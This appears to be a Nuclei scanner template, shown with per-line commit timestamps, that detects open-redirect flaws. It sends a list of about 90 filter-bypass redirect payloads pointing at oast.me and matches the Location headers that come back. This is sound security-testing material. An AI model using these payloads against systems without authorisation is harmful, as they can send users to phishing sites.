2024-03-19 15:34:31 +00:00
id : open-redirect-generic
2021-02-14 11:41:51 +00:00
info :
2022-10-19 21:11:27 +00:00
name : Open Redirect - Detection
2021-06-09 12:20:56 +00:00
author : afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
2023-01-23 22:14:23 +00:00
severity : medium
2022-10-19 21:11:27 +00:00
description : An open redirect vulnerability was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cwe-id : CWE-601
2023-04-28 08:11:21 +00:00
metadata :
2023-06-21 21:03:53 +00:00
max-request : 93
2023-06-08 04:10:40 +00:00
tags : redirect,generic
2021-02-14 11:41:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-12-10 14:42:59 +00:00
- method : GET
path :
- "{{RootURL}}/{{redirect}}"
2021-02-14 11:41:51 +00:00
2021-12-26 15:23:11 +00:00
payloads :
redirect :
2024-07-14 08:06:22 +00:00
- '%0a/oast.me/'
- '%0d/oast.me/'
- '%00/oast.me/'
- '%09/oast.me/'
- '%5C%5Coast.me/%252e%252e%252f'
- '%5Coast.me'
- '%5coast.me/%2f%2e%2e'
- '%5c{{RootURL}}oast.me/%2f%2e%2e'
- '../oast.me'
- '.oast.me'
- '/%5coast.me'
- '////\;@oast.me'
- '////oast.me'
- '///oast.me'
- '///oast.me/%2f%2e%2e'
- '///oast.me@//'
- '///{{RootURL}}oast.me/%2f%2e%2e'
- '//;@oast.me'
- '//\/oast.me/'
- '//\@oast.me'
- '//\oast.me'
- '//\toast.me/'
- '//oast.me/%2F..'
- '//oast.me//'
2024-07-14 08:11:38 +00:00
- '//%6f%61%73%74%2e%6d%65'
2024-07-14 08:06:22 +00:00
- '//oast.me@//'
- '//oast.me\toast.me/'
- '//https://oast.me//'
- '/<>//oast.me'
- '/\/\/oast.me/'
- '/\/oast.me'
- '/\oast.me'
- '/oast.me'
- '/oast.me/%2F..'
- '/oast.me/'
- '/oast.me/..;/css'
- '/https:oast.me'
- '/{{RootURL}}oast.me/'
- '/〱oast.me'
- '/〵oast.me'
- '/ゝoast.me'
- '/ーoast.me'
- '/ーoast.me'
- '<>//oast.me'
- '@oast.me'
- '@https://oast.me'
- '\/\/oast.me/'
2024-07-14 08:11:38 +00:00
- 'oast%E3%80%82me'
2024-07-14 08:06:22 +00:00
- 'oast.me'
- 'oast.me/'
- 'oast.me//'
- 'oast.me;@'
- 'https%3a%2f%2foast.me%2f'
- 'https:%0a%0doast.me'
- 'https://%0a%0doast.me'
- 'https://%09/oast.me'
- 'https://%2f%2f.oast.me/'
- 'https://%3F.oast.me/'
- 'https://%5c%5c.oast.me/'
- 'https://%5coast.me@'
- 'https://%23.oast.me/'
- 'https://.oast.me'
- 'https://////oast.me'
- 'https:///oast.me'
- 'https:///oast.me/%2e%2e'
- 'https:///oast.me/%2f%2e%2e'
- 'https:///oast.me@oast.me/%2e%2e'
- 'https:///oast.me@oast.me/%2f%2e%2e'
- 'https://:80#@oast.me/'
- 'https://:80?@oast.me/'
- 'https://:@\@oast.me'
- 'https://:@oast.me\@oast.me'
- 'https://;@oast.me'
- 'https://\toast.me/'
- 'https://oast.me/oast.me'
- 'https://oast.me/https://oast.me/'
- 'https://www.\.oast.me'
- 'https:/\/\oast.me'
- 'https:/\oast.me'
- 'https:/oast.me'
- 'https:oast.me'
- '{{RootURL}}oast.me'
- '〱oast.me'
- '〵oast.me'
- 'ゝoast.me'
- 'ーoast.me'
- 'ーoast.me'
- 'redirect/oast.me'
- 'cgi-bin/redirect.cgi?oast.me'
- 'out?oast.me'
- 'login?to=http://oast.me'
- '1/_https@oast.me'
- 'redirect?targeturl=https://oast.me'
2024-05-31 17:06:15 +00:00
2021-09-02 11:59:10 +00:00
stop-at-first-match : true
2023-10-14 11:27:55 +00:00
2021-06-29 11:56:42 +00:00
matchers-condition : and
2021-02-14 11:41:51 +00:00
matchers :
- type : regex
2023-01-07 19:00:41 +00:00
part : header
2021-12-13 15:08:21 +00:00
regex :
2024-07-14 08:06:22 +00:00
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
2021-06-29 11:56:42 +00:00
- type : status
status :
- 301
2021-12-13 15:08:21 +00:00
- 302
- 307
2021-12-26 15:23:11 +00:00
- 308
2022-06-25 07:08:56 +00:00
condition : or
2024-07-14 08:16:27 +00:00
# digest: 4a0a00473045022100b327ea17f154456b706a540e72c9c79e4c901a70091e38648ed261ecd5b0094502202f0ae209b845dc30c6fb92d9f33617dbca5720568776d2b1e8df2c17cb36202d:922c64590222798bb761d5b6d8e72950
